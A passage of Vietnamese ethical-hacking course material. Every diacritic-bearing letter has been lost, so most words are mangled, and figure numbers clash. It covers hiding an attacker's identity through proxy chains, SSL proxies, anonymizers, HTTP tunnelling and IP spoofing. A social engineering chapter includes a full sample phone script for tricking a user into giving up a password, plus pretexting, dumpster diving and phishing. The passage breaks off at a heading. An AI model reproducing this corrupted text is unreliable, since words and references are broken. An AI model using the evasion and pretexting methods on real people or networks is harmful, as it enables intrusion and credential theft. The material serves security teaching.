V s mng ca my ch l cn thit, c bit ch n nhng my ch d b tn thng. Cng c qun l mng c th h tr bc ny. cc cng c nh vy thng c s dng qun l cc thit b mng nhng c th quay lng li vi cc qun tr vin bo mt bi cc hacker c gan. SolarWinds Toolset, Queso, Harris Stat, v Cheops l cc cng c qun l mng s dng nhn bit h iu hnh, lp bng , s mng, danh sch cc dch v ang chy trn mng, qut cng thng thng v hn na. Nhng cng c ny v ton b mng trong giao din GUI gm routers, servers, hosts v firewalls. Hu ht cc cng c ny c th tm ra IP, host names, services, h iu hnh, v thng tin version. Hnh 5.7: Giao din lm vic ca phn mm LanState Netcraft v HTTrack l cng c ghi du mt h iu hnh. C hai s dng xc nh h iu hnh v s phin bn phn mm web-server.

Netcraft l website m nh k thc hin cc cuc thm d web server xc nh phin bn h iu hnh v phin bn phn mm web-server. Netcraft c th cung cp thng tin hu ch cho hacker c th s dng pht hin nhng tn thng trn phn mm web server. Ngoi ra, Netcraft c thanh cng c anti-phishing (chng la o) v cng c xc nhn web-server, bn c th s dng m bo rng ang s web-server tht, khng phi gi. HTTrack sp xp cu trc lin kt tng i, ban u ca cc trang web. Bn m mt trang ca website c nhn i trong trnh duyt,v sau bn c th duyt cc trang web t lin kt lin kt nh th bn ang xem n trc tuyn. HTTrack cng c th cp nht mt trang web hin c c nhn i v phc hi download b gin on.

3.5.

Trin khai Proxy Server tn cng

Chun b my ch proxy l bc cui cng trong phng php qut CEH. Mt proxy server l mt my tnh hot ng trung gian gia hacker v my tnh ch. S dng mt proxy server c th cho php hacker tr thnh v danh trn mng. Hacker trc tin kt ni ti my proxy server ri yu cu kt ni ti my ch thng qua kt ni c sn n proxy. C bn, proxy yu cu truy cp n mc tiu m khng phi l my tnh ca hacker. iu ny lm hacker lt web v danh hoc n trong cuc tn cng. Hnh 5.8: M hnh tn cng ca attacker Trong hnh 4.8 l m hnh tn cng c cc attacker p dng. Trong , tn cng trc tip (1) t c s dng nht, v nguy c b pht hin rt cao. Hai phng php cn li li thng

qua mt proxy (2) v qua hng lot cc my tnh trung gian (3) c p dng nhiu hn. Tuy nhin cch th 3 th kh trin khai hn, v thng p dng cho mt cuc tn cng trn quy m ln. Bn c th d dng tm thy cc proxy server min ph ny trn mng. Vi t kha free proxy server trn google bn c th tm thy nhiu trang web cung cp tnh nng ny.
Hacking Tool

SocksChain l cng c cung cp cho hacker kh nng tn cng thng qua mt chui proxy servers. Mc ch chnh ca vic ny l n IP thc v do s pht hin s mc thp nht. Khi mt hacker lm vic thng qua vi proxy servers trong series, th kh khn hn nhiu xc nh v tr hacker. Theo di a ch IP ca k tn cng thng qua cc bn ghi ca my ch proxy l mt s cng vic phc tp v t nht. nu mt trong cc tp tin ng nhp ca proxy server b mt hoc khng y , dy chuyn b hng, v addess IP cahacker vn cn v danh. SSL Proxy SSL Proxy l proxy trong sut c s dng chuyn i gia hai h thng, mt c m ha, v mt khng c m ha no. Bn s dng SSL Proxy trong cc trng hp sau:

Tn cng vo mt h thng c ci t dch v SSL Khai thc nhng thng tin ca mt h thng thng qua IDS. S dng SSL Proxy to ng hm (tunnel) kt ni n h thng ch, chy ngang qua mt IDS, ni m c th b chn ng trong cuc tn cng.

Hnh 5.9: M hnh s dng SSL Proxy thc hin tn cng


Hacking Tool

SSL Proxy cng chnh l tn cng c dng lnh cho php chng ta to mt SSL Proxy Tunnel, phc v cho cuc tn cng sp ti. Trong hnh bn di l hng dn c bn dng lnh chng ta s dng khi ci SSL Proxy. Hnh 5.10: Hng dn s dng SSL Proxy

4. K thut Anonymously
Anonymously (tm gi l n danh) l dch v c gng lt web v danh s dng mt website m hot ng nh mt proxy server cho web client. Phn mm n danh u tin pht trin bi Anonymizer.com; n c to ra nm 1997 bi Lance Cottrell. Dch v Anonymizers loi b tt c thng tin xc nh t my tnh ngi dng trong khi h lt web trn Internet, theo cch m bo s ring t ca ngi s dng. vo mt website n danh, hacker vo a ch website qua phn mm n danh, v phn mm n danh to yu cu chn trang web. Tt c cc trang web yu cu c chuyn tip qua cc trang web n danh, kh theo di cc yu cu t trang web.

Trong hnh 4.11 l mt vi d, khi bn mun truy cp vo website www.target.com nhng li b cm bi cc chnh sch bo mt ca web server. Bn thc hin truy cp bng cch thng qua mt trang web gip bn n danh l www.proxify.com Hnh 5.11: V d truy cp web thng qua Anonymizers
Hacking Tool

Vi trang web sau y s gip chng ta gi danh trong vic truy cp web

http://www.primedius.com http://www.browzar.com http://www.rorrify.com

5. K thut HTTP TUNNELING


Mt phng php ph bin ca vng qua tng la hoc IDS l mt to mt ng hm (nh SMTP) thng qua mt giao thc cho php (nh HTTP). Hu ht cc IDS v tng la hot ng nh mt proxy gia my tnh ca khch hng v Internet, v ch cho php truy cp vi nhng host c nh ngha l c php. Hu ht cc cng ty cho php HTTP giao thng bi v n thng truy cp web lnh tnh. Tuy nhin, hacker c th to ra mt ng hm bng giao thc HTTP truy cp vo mng bn trong vi giao thc khng c php. HTTP Tunneling khng hn l ch dnh cho hacker. Bn c th p dng n to ra mt h thng kt ni hai chi nhnh an ton bng giao thc HTTP. Trong hnh 4.12 l mt v d v vic kt ni hai chi nhnh trao i d liu qua giao thc FTP, trong khi giao thc ny b chn bi tng la. Bng cch ny, client c th kt ni v my ch FTP ly d liu thng qua HTTP Tunneling. Hnh 5.12: Client kt ni v FTP thng qua HTTP Tunneling
Hacking Tool

HTTPort, Tunneld, v BackStealth l tt c cng c i qua ng hm thng qua HTTP. Chng cho php b qua mt proxy ca HTTP, m kha nhng phng php truy cp Internet nht nh. Nhng cng c ny cho php cc ng dng nh Email, IRC, ICQ, AIM, FTP cc phn mm nguy him c s dng t pha sau mt proxy HTTP.

6. K thut gi mo IP (Spoofing IP)


Mt hacker c th gi mo a ch IP khi qut my h thng hn ch thp nht kh nng b pht hin. Khi nn nhn (Victim) gi tr li v a ch IP, n s khng gi n a ch gi mo c. Mt nhc im ca gi mo IP l mt phin TCP khng th hon thnh c, do khng th gi hi p ACK.

Source routing cho php k tn cng ch nh vic nh tuyn mt gi tin c thng qua Internet. iu ny cng c th gim thiu c hi pht hin bng cch b qua IDS v tng la. Source routing c ci t trong giao thc TCP/IP vi hai hnh thc:

Loose Source routing (LSR): Routing khng chnh xc. Ngi gi gi mt danh sch ip trong bao gm ip ca mnh. Strict Source routing (SSR): Routing chnh xc. Ngi gi ch ra mt phn ca ng dn chuyn gi tin. Gi tin tr li s i qua ng dn .

Source routing s dng trng a ch ca gi tin IP Header ln n 39-byte tc l s c ti a 8 a ch ip c thm vo trng a ch. Khi my gi s gi qua mt lot ip gi, trong s c ip tht ca k tn cng. Hnh 5.13: Qu trnh tn cng gi a ch ip Hnh 4.13 l mt v d v qu trnh gi IP. Bn nhn thy gi tin gi mo c a ch ngi gi (from address) l 10.0.0.5 v gi gi tin n 10.0.0.25 Khi my tnh 10.0.0.25 gi tr li th n chuyn n my 10.0.0.5, m y khng phi l my tnh ca hacker. Chng li vic gi IP pht hin gi mo a ch IP, bn c th so snh thi gian sng (TTL) cc gi tr:TTL ca k tn cng s khc vi TTL ca a ch gi mo. Hnh 5.14: Pht hin gi mo ip

7. Cc bin php i ph vi Scanning


Trong bi vit, chng ta cng c gii thiu vi phng php i ph vi cc k thut ca Scanning. Tuy nhin, ti mun ni thm vi cc bn vi vn na i ph vi Scanning. Firewall l mt phn quan trng ca mng. Nh bn thy trong bi, cc cng c scan u kh lng vt qua khi firewall. H thng pht hin xm nhp (IDS) cng l mt phn khng th thiu khi trin khai mng, mun chng li vic scanning. H thng ny ch c kh nng pht hin qu trnh scan m khng th chn qu trnh scan c. Ch nn m nhng port cn thit, v ng nhng port khng cn trnh attacker li dng. Nhng thng tin nhy cm khng nn a ra internet. V d nh thng tin v h iu hnh, phin bn phn mm ang dng

8. Tng Kt
Trong chng ny bn cn nm r cc vn nh sau:

C ba loi scanning chnh l Port, network, and vulnerability scanning Lm sao bit c mt h thng cn sng hay khng. S dng ICMP Ping Sweep nh th no. Tm hiu v cng c scanning port ni ting l NMAP. S khc bit ca cc loi scanning trong gia nh TCP nh: TCP connect, SYN, NULL, IDLE, FIN, and XMAS v khi no s dng loi no. Tm hiu v quy trnh bt tay ba bc TCP. iu ny gip chng ta tn cng gim ri ro b pht hin. H thng IDS, IPS c dng chng li scanning. War dialing l g? N c s dng trong tn cng vo h thng dial-in. K thut fingerprinting c hai loi Active v Passive, N c dng thu thp thng tin h iu hnh. K thut anonymously lt web v danh v c ch HTTP Tunneling cng k thut IP Spoofing l nhng k thut gip chng ta n danh trong hot ng tn cng. S dng n gip

///////////////////////

CHNG 4: SOCIAL ENGINEERING


Social engineering l phng php phi k thut t nhp vo h thng hoc mng cng ty. l qu trnh nh la ngi dng ca h thng, hoc thuyt phc h cung cp thng tin c th gip chng ta nh bi b phn an ninh. Social engineering l rt quan trng tm hiu, bi v hacker c th li dng tn cng vo yu t con ngi v ph v h thng k thut an ninh hin ti. Phng php ny c th s dng thu thp thng tin trc hoc trong cuc tn cng.

1. Social engineering l g?
Social engineering s dng s nh hng v s thuyt phc nh la ngi dng nhm khai thc cc thng tin c li cho cuc tn cng hoc thuyt phc nn nhn thc hin mt hnh ng no . Social engineer (ngi thc hin cng vic tn cng bng phng php social engineering) thng s dng in thoi hoc internet d d ngi dng tit l thng tin nhy cm hoc c c h c th lm mt chuyn g chng li cc chnh sch an ninh ca t chc. Bng phng php ny, Social engineer tin hnh khai thc cc thi quen t nhin ca ngi dng, hn l tm cc l hng bo mt ca h thng. iu ny c ngha l ngi dng vi kin thc bo mt km ci s l c hi cho k thut tn cng ny hnh ng. Sau y l mt v d v k thut tn cng social engineering c Kapil Raina k li, hin ng ny ang l mt chuyn gia an ninh ti Verisign, cu chuyn xy ra khi ng ang lm vic ti mt cng ty khc trc : Mt bui sng vi nm trc, mt nhm ngi l bc vo cng ty vi t cch l nhn vin ca mt cng ty vn chuyn m cng ty ny ang c hp ng lm vic chung. V h bc ra vi quyn truy cp vo ton b h thng mng cng ty. H lm iu bng cch no?. Bng cch ly mt lng nh thng tin truy cp t mt s nhn vin khc nhau trong cng ty. u tin h tin hnh mt nghin cu tng th v cng

ty t hai ngy trc. Tip theo h gi v lm mt cha kha vo ca trc, v mt nhn vin cng ty gip h tm li c. Sau , h lm mt th an ninh vo cng cng ty, v ch bng mt n ci thn thin, nhn vin bo v m ca cho h vo. Trc h bit trng phng ti chnh va c cuc cng ta xa, v nhng thng tin ca ng ny c th gip h tn cng h thng. Do h t nhp vn phng ca gim c ti chnh ny. H lc tung cc thng rc ca cng ty tm kim cc ti liu hu ch. Thng qua lao cng ca cng ty, h c thm mt s im cha ti liu quan trng cho h m l rc ca ngi khc. im quan trng cui cng m h s dng l gi ging ni ca v gim c vn mt ny. C thnh qu l do h tin hnh nghin cu ging ni ca v gim c. V nhng thng tin ca ng gim c m h thu thp c t thng rc gip cho h to s tin tng tuyt i vi nhn vin. Mt cuc tn cng din ra, khi h gi in cho phng IT vi vai tr gim c phng ti chnh, lm ra v mnh b mt pasword, v rt cn password mi. H tip tc s dng cc thng tin khc v nhiu k thut tn cng gip h chim lnh ton b h thng mng. Nguy him nht ca k thut tn cng ny l quy trnh thm nh thng tin c nhn. Thng qua tng la, mng ring o, phn mm gim st mngs gip rng cuc tn cng, bi v k thut tn cng ny khng s dng cc bin php trc tip. Thay vo yu t con ngi rt quan trng. Chnh s l l ca nhn vin trong cng ty trn cho k tn cng thu thp c thng tin quan trng.

2. Ngh thut ca s thao tng


Social Engineering bao gm vic t c nhng thng tin mt hay truy cp tri php, bng cch xy dng mi quan h vi mt s ngi. Kt qu ca social engineer l la mt ngi no cung cp thng tin c gi tr. N tc ng ln phm cht vn c ca con ngi, chng hn nh mong mun tr thnh ngi c ch, tin tng mi ngi v s nhng rc ri. Social engineering vn dng nhng th thut v k thut lm cho mt ngi no ng lm theo nhng g m Social engineer mun. N khng phi l cch iu khin suy ngh ngi khc, v n khng cho php Social engineer lm cho ngi no lm nhng vic vt qu t cch o c thng thng. V trn ht, n khng d thc hin cht no. Tuy nhin, l mt phng php m hu ht Attackers dng tn cng vo cng ty. C 2 loi rt thng dng :

Social engineering l vic ly c thng tin cn thit t mt ngi no hn l ph hy h thng. Psychological subversion: mc ch ca hacker hay attacker khi s dng PsychSub (mt k thut thin v tm l) th phc tp hn v bao gm s chun b, phn tch tnh hung, v suy ngh cn thn, chnh xc nhng t s dng v ging iu khi ni, v n thng s dng trong qun i.

Sau y l mt tnh hung m mt Attacker nh cp password ca mt khch hng. Nu bn c lm hacker th c th hc hi, cn nu bn l ngi dng th hy cn thn khi gp tnh hung tng t. Vo mt bui sng, c Alice ang n sng th nhn c cuc gi. Attacker : Cho b, ti l Bob, ti mun ni chuyn vi c Alice

Alice: Xin cho, ti l Alice. Attacker: Cho c Alice, ti gi t trung tm d liu, xin li v ti gi in cho c sm Th ny Alice: Trung tm d liu , ti ang n sng, nhng khng sao u. Attacker: Ti gi in cho c v nhng thng tin c nhn ca c trong phiu thng tin to account c vn . Alice: Ca ti .. vng. Attacker: Ti thng bo vi c v vic server mail va b sp ti qua, v chng ti ang c gng phc hi li h thng mail. V c l ngi s dng xa nn chng ti x l trng hp ca c trc tin. Alice: Vy mail ca ti c b mt khng? Attacker: Khng u, chng ti c th phc hi li c m. Nhng v chng ti l nhn vin phng d liu, v chng ti khng c php can thip vo h thng mail ca vn phng, nn chng ti cn c password ca c, nu khng chng ti khng th lm g c. Alice: Password ca ti ?uhm.. Attacker: Vng, chng ti hiu, trong bn ng k ghi r chng ti khng c hi v vn ny, nhng n c vit bi vn phng lut, nn tt c phi lm ng theo lut. ( n lc lm tng s tin tng t nn nhn) Attacker: Username ca c l AliceDxb phi khng? Phng h thng a cho chng ti username v s in thoi ca c, nhng h khng a password cho chng ti. Khng c password th khng ai c th truy cp vo mail ca c c, cho d chng ti phng d liu. Nhng chng ti phi phc hi li mail ca c, v chng ti cn phi truy cp vo mail ca c. Chng ti m bo vi c chng ti s khng s dng password ca c vo bt c mc ch no khc. Alice: uhm, pass ny cng khng ring t lm u, pass ca ti l 123456 Attacker: Cm n s hp tc ca c. Chng ti s phc hi li mail ca c trong vi pht na. Alice: C chc l mail khng b mt khng? Attacker: Tt nhin l khng ri. Chc c cha gp trng hp ny bao gi, nu c thc mc g th hy lin h vi chng ti. C c th tm s lin lc trn Internet. Alice: Cm n.

Attacker: Cho c.

3. im yu ca mi ngi
Mi ngi thng mc phi nhiu im yu trong cc vn bo mt. phng thnh cng th chng ta phi da vo cc chnh sch tt v hun luyn nhn vin thc hin tt cc chnh sch . Social engineering l phng php kh phng chng nht v n khng th dng phn cng hay phn mm chng li. Mt ngi no khi truy cp vo bt c phn no ca h thng th cc thit b vt l v vn cp in c th l mt tr ngi ln. Bt c thng tin no thu thp c u c th dng phng php Social engineering thu thp thm thng tin. C ngha l mt ngi khng nm trong chnh sch bo mt cng c th ph hy h thng bo mt. Cc chuyn gia bo mt cho rng cch bo mt giu i thng tin l rt yu. Trong trng hp ca Social engineering, hon ton khng c s bo mt no v khng th che giu vic ai ang s dng h thng v kh nng nh hng ca h ti h thng. C nhiu cch hon thnh mc tiu ra. Cch n gin nht l yu cu trc tip, l t cu hi trc tip. Mc d cch ny rt kh thnh cng, nhng y l phng php d nht, n gin nht. Ngi bit chnh xc h cn g. Cch th hai, to ra mt tnh hung m nn nhn c lin quan n. Vi cc nhn t khc nhau cn c yu cu xem xt, lm th no nn nhn d dng dnh by nht, bi v attacker c th to ra nhng l do thuyt phc hn nhng ngi bnh thng. Attacker cng n lc th kh nng thnh cng cng cao, thng tin thu c cng nhiu. Khng c ngha l cc tnh hung ny khng da trn thc t. Cng ging s tht th kh nng thnh cng cng cao. Mt trong nhng cng c quan trng c s dng trong Social engineering l mt tr nh tt thu thp cc s kin. l iu m cc hacker v sysadmin ni tri hn, c bit khi ni n nhng vn lin quan n lnh vc ca h.

4. Phn loi k thut tn cng Social engineering


Social engineering c th c chia thnh hai loi ph bin: Human-based: K thut Social engineering lin quan n s tng tc gia con ngi vi con ngi thu c thng tin mong mun. V d nh chng ta phi gi in thoi n phng Help Desk truy tm mt khu. Computer-based: K thut ny lin quan n vic s dng cc phn mm c gng thu thp thng tin cn thit. V d bn gi email v yu cu ngi dng nhp li mt khu ng nhp vo website. K thut ny cn c gi l Phishing (la o).

4.1.

Human-Based Social Engineering

K thut Human Based c th chia thnh cc loi nh sau:

Impersonation: Mo danh l nhn vin hoc ngi dng hp l. Trong k thut ny, k tn cng s gi dng thnh nhn vin cng ty hoc ngi dng hp l ca h thng. Hacker mo danh mnh l ngi gc cng, nhn vin, i tc, p nhp cng ty. Mt khi vo c bn trong, chng tin hnh thu thp cc thng tin t thng rc, my tnh bn, hoc cc h thng my tnh, hoc l hi thm nhng ngi ng nghip. Posing as Important User: Trong vai tr ca mt ngi s dng quan trng nh ngi quan l cp cao, trng phng, hoc nhng ngi cn tr gip ngay lp tc, hacker c th d d ngi dng cung cp cho chng mt khu truy cp vo h thng. Third-person Authorization: Ly danh ngha c s cho php ca mt ngi no truy cp vo h thng. V d mt tn hacker ni anh c s y quyn ca gim c dng ti khon ca gim c truy cp vo h thng. Calling Technical Support: Gi in thoi n phng t vn k thut l mt phng php c in ca k thut tn cng Social engineering. Help-desk v phng h tr k thut c lp ra gip cho ngi dng, cng l con mi ngon cho hacker. Shoulder Surfing l k thut thu thp thng tin bng cch xem file ghi nht k h thng. Thng thng khi ng nhp vo h thng, qu trnh ng nhp c ghi nhn li, thng tin ghi li c th gip ch nhiu cho hacker. Dumpster Diving l k thut thu thp thng tin trong thng rc. Nghe c v tin v phi li thng rc ca ngi ta ra tm kim thng tin, nhng v i cuc phi chp nhn hi sinh. Ni vui vy, thu thp thng tin trong thng rc ca cc cng ty ln, thng tin m chng ta cn thu c th l password, username, filename hoc nhng thng tin mt khc. V d: Thng 6 nm 2000, Larry Ellison, ch tch Oracle, tha nhn l Oracle dng n dumpster diving c gng tm ra thng tin v Microsoft trong trng hp chng c quyn. Danh t larrygate, khng l mi trong hot ng tnh bo doanh nghip. Mt s th m dumpster c th mang li: (1).Sch nin gim in thoi cng ty bit ai gi sau dng mo nhn l nhng bc u tin t quyn truy xut ti cc d liu nhy cm. N gip c c tn v t cch chnh xc lm c v nh l nhn vin hp l. Tm cc s gi l mt nhim v d dng khi k tn cng c th xc nh tng i in thoi ca cng ty t sch nin gim. (2).Cc biu t chc; bn ghi nh; s tay chnh sch cng ty; lch hi hp, s kin, v cc k ngh; s tay h thng; bn in ca d liu nhy cm hoc tn ng nhp v password; bn ghi source code; bng v a; cc a cng ht hn. Phng php nng cao hn trong k thut Social engineering l Reverse Social Engineering (Social engineering ngc). Trong k thut ny, hacker tr thnh ngi cung cp thng tin. iu khng c g l ngc nhin, khi hacker by gi chnh l nhn vin phng help desk. Ngi dng b mt password, v yu cu nhn vin helpdesk cung cp li.

4.2.

Computer-Based Social Engineering

Computer Based: l s dng cc phn mm ly c thng tin mong mun. C th chia thnh cc loi nh sau:

Phising: Thut ng ny p dng cho mt email xut hin n t mt cng ty kinh doanh, ngn hng hoc th tn dng yu cu chng thc thng tin v cnh bo s xy ra hu qu nghim trng nu vic ny khng c lm. L th thng cha mt ng link n mt trang web gi mo trng hp php vi logo ca cng ty v ni dung c cha form yu cu username, password, s th tn dng hoc s pin. Vishing: Thut ng l s kt hp ca voice v phishing. y cng l mt dng phising, nhng k tn cng s trc tip gi in cho nn nhn thay v gi email. Ngi s dng s nhn c mt thng ip t ng vi ni dung cnh bo vn lin quan n ti khon ngn hng. Thng ip ny hng dn h gi n mt s in thoi khc phc vn . Sau khi gi, s in thoi ny s kt ni ngi c gi ti mt h thng h tr gi, yu cu h phi nhp m th tn dng. V Voip tip tay c lc thm cho dng tn cng mi ny v gi r v kh gim st mt cuc gi bng Voip. Pop-up Windows: Mt ca s s xut hin trn mn hnh ni vi user l anh ta mt kt ni v cn phi nhp li username v password. Mt chng trnh c ci t trc bi k xm nhp sau s email thng tin n mt website xa. Mail attachments: C 2 hnh thc thng thng c th c s dng. u tin l m c hi. M ny s lun lun n trong mt file nh km trong email. Vi mc ch l mt user khng nghi ng s click hay m file , v d virus IloveYou, su Anna Kournikova( trong trng hp ny file nh km tn l AnnaKournikova.jpg.vbs. Nu tn file b ct bt th n s ging nh file jpg v user s khng ch phn m rng .vbs). Th hai cng c hiu qu tng t, bao gm gi mt file nh la hi user xa file hp php. Chng c lp k hoch lm tc nghn h thng mail bng cch bo co mt s e da khng tn ti v yu cu ngi nhn chuyn tip mt bn sao n tt c bn v ng nghip ca h. iu ny c th to ra mt hiu ng gi l hiu ng qu cu tuyt. Websites: Mt mu mo lm cho user khng ch l ra d liu nhy cm, chng hn nh password h s dng ti ni lm vic. V d, mt website c th to ra mt cuc thi h cu, i hi user in vo a ch email v password. Password in vo c th tng t vi password c s dng c nhn ti ni lm vic. Nhiu nhn vin s in vo password ging vi password h s dng ti ni lm vic, v th social engineer c username hp l v password truy xut vo h thng mng t chc. Interesting Software: Trong trng hp ny nn nhn c thuyt phc ti v v ci t cc chng trnh hay ng dng hu ch nh ci thin hiu sut ca CPU, RAM, hoc cc tin ch h thng hoc nh mt crack s dng cc phn mm c bn quyn. V mt Spyware hay Malware ( chng hn nh Keylogger) s c ci t thng qua mt chng trnh c hi ngy trang di mt chng trnh hp php.

5. Cc bc tn cng trong Social Engineering


5.1. Thu thp thng tin

Mt trong nhng cha kha thnh cng ca Social Engineering l thng tin. ng ngc nhin l d dng thu thp y thng tin ca mt t chc v nhn vin trong t chc . Cc t chc c khuynh hng a qu nhiu thng tin ln website ca h nh l mt phn ca chin lc kinh doanh. Thng tin ny thng m t hay a ra cc u mi nh l cc nh cung cp c th k kt; danh sch in thoai v email; v ch ra c chi nhnh hay khng nu c th chng u. Tt c thng tin ny c th l hu ch vi cc nh u t tim nng, nhng n cng c th b s dng trong tn cng Social Engineering. Nhng th m cc t chc nm i c th l ngun ti nguyn thng tin quan trng. Tm kim trong thng rc c th khm ph ha n, th t, s tay,.. c th gip cho k tn cng kim c cc thng tin quan trng. Mc ch ca k tn cng trong bc ny l hiu cng nhiu thng tin cng tt lm ra v l nhn vin, nh cung cp, i tc chin lc hp l,

5.2.

Chn mc tiu

Khi khi lng thng tin ph hp c tp hp, k tn cng tm kim im yu ng ch trong nhn vin ca t chc . Mc tiu thng thng l nhn vin h tr k thut, c tp luyn a s gip v c th thay i password, to ti khon, kch hot li ti khon, Mc ch ca hu ht k tn cng l tp hp thng tin nhy cm v ly mt v tr trong h thng. K tn cng nhn ra l khi chng c th truy cp, thm ch l cp khch, th chng c th nng quyn ln, bt u tn cng ph hoi v che giu vt. Tr l administrator l mc tiu k tip. l v cc c nhn ny c th tip cn vi cc d liu nhy cm thng thng c lu chuyn gia cc thnh vin qun tr cp cao. Nhiu cc tr l ny thc hin cc cng vic hng ngy cho qun l ca h m cc cng vic ny yu cu c quyn ti khon ca ngi qun l.

5.3.

Tn cng

S tn cng thc t thng thng da trn ci m chng ta gi l s lng gt. Gm c 3 loi chnh:

1. 1.

Ego attack: trong loi tn cng u tin ny, k tn cng da vo mt vi c im c bn ca con ngi. Tt c chng ta thch ni v chng ta thng minh nh th no v chng ta bit hoc chng ta ang lm hoc hiu chnh cng ty ra sao. K tn cng s s dng iu ny trch ra thng tin t nn nhn ca chng. K tn cng thng chn nn nhn l ngi cm thy b nh gi khng ng mc v ang lm vic v tr m di ti nng ca h. K tn cng thng c th phn on ra iu ny ch sau mt cuc ni chuyn ngn. 2. 2. Sympathy attacks: Trong loi tn cng th hai ny, k tn cng thng gi v l nhn vin tp s, mt nh thu, hoc mt nhn vin mi ca mt nh cung cp hoc i tc chin lc, nhng ngi ny xy ra tnh hung kh x v cn s gip thc hin xong nhim v.

S quan trng ca bc thu thp tr nn r rng y, khi k tn cng s to ra s tin cy vi nn nhn bng cch dng cc t chuyn ngnh thch hp hoc th hin kin thc v t chc. K tn cng gi v l hn ang bn v phi hon thnh mt vi nhim v m yu cu truy xut, nhng hn khng th nh username v password, Mt cm gic khn cp lun lun l phn trong kch bn. Vi bn tnh con ngi l thng cm nn trong hu ht cc trng hp yu cu s c chp nhn. Nu k tn cng tht bi khi ly truy xut hoc thng tin t mt nhn vin, hn s tip tc c gng cho n khi tm thy ngi thng cm, hoc cho n khi hn nhn ra l t chc nghi ng.

1. 3.

Intimidation attacks: Vi loi th ba, k tn cng gi v l l mt nhn vt c quyn, nh l mt ngi c nh hng trong t chc. K tn cng s nhm vo nn nhn c v tr thp hn v tr ca nhn vt m hn gi v. K tn cng to mt l do hp l cho cc yu cu nh thit lp li password, thay i ti khon, truy xut n h thng, hoc thng tin nhy cm.

6. Cc kiu tn cng ph bin


6.1. Insider Attacks
Nu mt hacker khng tm c cch no tn cng vo t chc, s la chn tt nht tip theo xm nhp l thu mt nhn vin, hoc tm kim mt nhn vin ang bt mn, lm ni gin, cung cp cc thng tin cn thit. chnh l Insider Attack tn cng ni b. Insider Attack c mt th mnh rt ln, v nhng gin ip ny c php truy cp vt l vo h thng cng ty, v di chuyn ra vo t do trong cng ty. Mt v d in hnh ti Vit Nam, chnh l v tn cng vo Vietnamnet (nm 2010) c cho rng c lin quan n s r r cc thng tin ni b. Mt kiu khc ca tn cng ni b, l chnh s ph m ca cc nhn vin. Nhng nhn vin lm vic vi mc lng thp km, v anh ta mun c mc lng cao hn. Bng cch xm nhp vo CSDL nhn s cng ty, anh ta c th thay i mc lng ca mnh. Hoc mt trng hp khc, nhn vin mun c tin nhiu hn, bng cch nh cp cc bng k hoch kinh doanh mang bn cho cc cng ty khc. Bo v, chng li s tn cng ni b Phng chng kiu tn cng ny tht s rt kh. V n khng c lin quan n h thng my mc, phn mm, m lin quan n vn tm l con ngi. Chng ta khng th on bit c khi no nhn vin phn bi, hay l anh y b mua chuc, p buc phi tham gia vo cuc tn cng. phng chng kiu ny, i hi c tp th cng ty c tinh thn on kt cao, v gim c, nh lnh o phi thu hiu tm l ca nhn vin. Lm th no nhn vin khng phn bi li mnh, iu ny thin v ngh thut ng x. Thng th mt t chc thu nhn vin an ninh, v t ra nhng chnh sch chng cuc tn cng t bn ngoi, m t khi phng n ni b bn trong. Vi cc h thng pht hin xm nhp (intrusion detection systems IDS), hu ht chng c thit k v trin khai pht

hin cc mi e da t bn ngoi. Tuy nhin, iu khng phi l tt c, IDS cng c gi tr trong vic pht hin cc cuc tn cng ni b, nu nh nhn vin an ninh bit cch khai thc.

6.2.

Identity Theft

Mt hacker c th gi danh mt nhn vin hoc n cp danh tnh ca mt nhn vin thm nhp vo h thng. Thng tin c thu thp thng qua k thut Dumpster Diving hoc Shoulder Surfing kt hp vi vic to ID gi (fake ID) c th gip cc hacker xm nhp vo t chc. Vic to ti khon xm nhp vo h thng m khng b phn i g ht nh th c v von l n trm hp php (Identity Theft)

6.3.

Phishing Attacks

V la o lin quan n email, thng mc tiu l ngn hng, cng ty th tn dng, hoc t chc lin quan ti chnh. Email yu cu ngi nhn xc nhn thng tin ngn hng, hoc t li email, m s PIN. Ngi dng click vo mt ng link trong email, v c dn n mt trang web gi mo. Hacker nm bt thng tin c li cho mc ch ti chnh hoc chun b cho mt cuc tn cng khc. Trong cc cuc tn cng, con mi l nhng ngi dng bnh thng, h ch bit cung cp nhng thng tin m hacker yu cu. V vy, pha cn phng chng l cc cng ty cung cp dch v, lm sao cho hacker khng th gi mo.

6.4.

Online Scams

Mt s trang web cung cp min ph hoc gim gi c bit vi th g , c th thu ht mt nn nhn ng nhp bng username v password thng dng hng ngy ng nhp vo h thng my tnh ca cng ty. Cc hacker c th s dng tn ngi dng v mt khu hp l, khi nn nhn nhp vo cc thng tin trn website. nh km vo email nhng on m c hi gi cho nn nhn, nhng th c th l mt chng trnh keylogger chp li mt khu. Virus, trojan, worm l nhng th khc c th c nh km vo email d d ngi dng m file. Trong v d di y m mt email bt chnh, dng d nn nhn m mt lin kt khng an ton.

Pop-up windows cng l mt k thut tng t. Trong cch thc ny, mt ca s pop-up s m ra vi li mi ngi dng ci vo my tnh mt phn min ph. V nh d m nn nhn v tnh ci vo mt m c hi.

6.5.

URL Obfuscation

URL thng c s dng trong thanh a ch ca trnh duyt truy cp vo mt trang web c th. URL Obfuscation l lm n hoc gi mo URL xut hin trn cc thanh a ch mt cch hp php. V d a ch http://204.13.144.2/Citibanj c th xut hin l a ch hp php cho ngn hnh Citibank, tuy nhin thc t th khng. URL Obfuscation s dng lm cho cuc tn cng v la o trc tuyn tr nn hp php hn. Mt trang web xem qua th hp

php vi hnh nh, tn ti ca cng ty, nhng nhng lin kt trong s dn n nhng trang web ca hacker. Vic gi mo c th nhm n nhng ngi dng bt cn. V d bn vo trang web http://ebay.com v thc hin giao dch bnh thng. Tuy nhin, bn vo trang gi mo ca hacker, v trang web ca ebay l https://ebay.com Khc bit l ch giao thc http v https

7. Cc mi e da Social Engineering
7.1. Online Threats
